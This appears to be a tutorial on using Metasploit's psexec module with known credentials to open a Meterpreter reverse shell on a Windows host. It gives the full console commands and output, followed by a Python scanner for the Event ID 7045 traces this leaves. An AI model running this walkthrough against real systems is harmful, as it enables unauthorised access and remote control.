The Meterpreter shell in Metasploit is a fantastic way to interact with a compromised box. The stage itself runs entirely in memory, so nothing of Meterpreter is left on disk after you disconnect. Don't mistake that for leaving no tracks, though: the delivery method used below uploads an executable to the target over SMB, then creates and starts a Windows service to run it. The module deletes both the service and the file afterwards, but the service installation is still recorded in the target's event logs, so "clean" here means no persistent binary, not no evidence.
I find myself using it fairly frequently against Windows machines that I’ve already gotten credentials for via some other means. In those cases it doesn’t make sense to use an actual exploit to get a Meterpreter shell going.
Use the psexec module to accomplish this. It lives under exploit/, but it isn't really an exploit: like the Sysinternals PsExec tool it is modelled on, it authenticates with the credentials you supply, copies a service binary to the target's admin share and starts it through the Service Control Manager over the svcctl named pipe. That means the account has to have local administrator rights on the target, since creating a service requires them.
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost 10.10.0.122
rhost => 10.10.0.122
msf exploit(psexec) > set smbpass Changem3
smbpass => Changem3
msf exploit(psexec) > set smbuser mark
smbuser => mark
msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST      10.10.0.122      yes       The target address
   RPORT      445              yes       Set the SMB service port
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass    Changem3         no        The password for the specified username
   SMBUser    mark             no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     10.10.0.149      yes       The listen address
   LPORT     4444             yes       The listen port

msf exploit(psexec) > exploit

[*] Started reverse handler on 10.10.0.149:4444
[*] Connecting to the server...
[*] Authenticating to 10.10.0.122:445|WORKGROUP as user 'mark'...
[*] Uploading payload...
[*] Created OUBfKBZr.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.0.122[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.0.122[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (PWFeuNyE - "MthJLAgTDPzWvZXfaw")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Sending stage (749056 bytes) to 10.10.0.122
[*] Deleting OUBfKBZr.exe...
[*] Meterpreter session 1 opened (10.10.0.149:4444 -> 10.10.0.122:1052) at 2011-03-13 17:08:13 -0700

meterpreter > sysinfo
Computer   : EARTH
OS         : Windows XP (Build 2600, Service Pack 3).
Arch       : x86
Language   : en_US
Meterpreter: x86/win32
File and Print Sharing (445/tcp) needs to be enabled on the target host (duh), and reachable through whatever firewall sits in front of it, or this obviously won't work. The credentials also have to be for an account that is a local administrator on the box; a plain user can authenticate to the share just fine but can't create the service, and the module will fail at that step rather than at login.
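The session output above shows the footprint this delivery leaves even though the module cleans up after itself: a service with a random eight-letter name, pointing at a random eight-letter .exe dropped at the root of the admin share, installed and removed within a few seconds. Windows records every service installation in the System log as Event ID 7045 ("A service was installed in the system"), so that pair of random names is what a defender looks for. The scanner below is an added example, not code from the original post or from Metasploit. It assumes the System log has been exported to text as one pipe-separated record per line (timestamp, EventID, ServiceName, ImagePath, ServiceType, StartType, AccountName; a format chosen here for the example), and that the image path is recorded as %SYSTEMROOT%\<name>.exe, which is where a file uploaded to ADMIN$ ends up. The sample records are constructed; the first hit reuses the service and file names from the session above, and the others are ordinary services included for contrast.

```python
import re
from dataclasses import dataclass
from datetime import datetime

# System-log event ID written when a service is installed.
SERVICE_INSTALLED = 7045

# Both the service name ("PWFeuNyE") and the dropped binary ("OUBfKBZr.exe") in
# the session above are eight random letters; that shape is what we key on.
RANDOM8 = re.compile(r"^[A-Za-z]{8}$")
# Assumption: the image path is recorded as %SYSTEMROOT%\<name>.exe, where a
# file uploaded to the ADMIN$ share lands. Case-insensitive on purpose.
ADMIN_ROOT_EXE = re.compile(r"^%SYSTEMROOT%\\([A-Za-z]{8})\.exe$", re.IGNORECASE)

# Constructed sample export (not a real capture), one record per line:
# timestamp|EventID|ServiceName|ImagePath|ServiceType|StartType|AccountName
SAMPLE_LOG = """\
2011-03-13 17:07:10|7045|Spooler|%SystemRoot%\\System32\\spoolsv.exe|user mode service|auto start|LocalSystem
2011-03-13 17:08:09|7045|PWFeuNyE|%SYSTEMROOT%\\OUBfKBZr.exe|user mode service|demand start|LocalSystem
2011-03-13 17:08:13|7036|PWFeuNyE|||||
2011-03-14 09:02:44|7045|gupdate|C:\\Program Files\\Google\\Update\\GoogleUpdate.exe|user mode service|auto start|LocalSystem
"""


@dataclass
class ServiceInstall:
    when: datetime
    name: str
    image_path: str
    account: str


def parse_records(text: str) -> list[ServiceInstall]:
    """Return the 7045 records in the export; every other event ID is skipped."""
    installs = []
    for line in text.splitlines():
        fields = line.split("|")
        if len(fields) < 7 or fields[1] != str(SERVICE_INSTALLED):
            continue
        when, _eid, name, path, _stype, _start, account = fields[:7]
        installs.append(ServiceInstall(
            datetime.strptime(when, "%Y-%m-%d %H:%M:%S"), name, path, account))
    return installs


def looks_like_psexec(rec: ServiceInstall) -> bool:
    """True when the service name and its binary both look machine-generated.

    A legitimate service can match by accident, so treat a hit as a lead to
    confirm against the Security log and network data, not as proof.
    """
    return (RANDOM8.match(rec.name) is not None
            and ADMIN_ROOT_EXE.match(rec.image_path) is not None)


def find_psexec_installs(text: str) -> list[ServiceInstall]:
    """Parse an export and return only the records that fit the psexec footprint."""
    return [rec for rec in parse_records(text) if looks_like_psexec(rec)]


if __name__ == "__main__":
    for hit in find_psexec_installs(SAMPLE_LOG):
        print(f"{hit.when:%Y-%m-%d %H:%M:%S}  service {hit.name!r} -> "
              f"{hit.image_path} (runs as {hit.account})")
```

Run against the sample, only the PWFeuNyE record comes back. The real-world refinement is to pair each hit with an outbound connection from the host starting within a few seconds of the install, which is exactly the reverse_tcp to 4444 visible in the session above; a service that is installed, connects out and is gone inside ten seconds is about as clear a signal as Windows logging gives you.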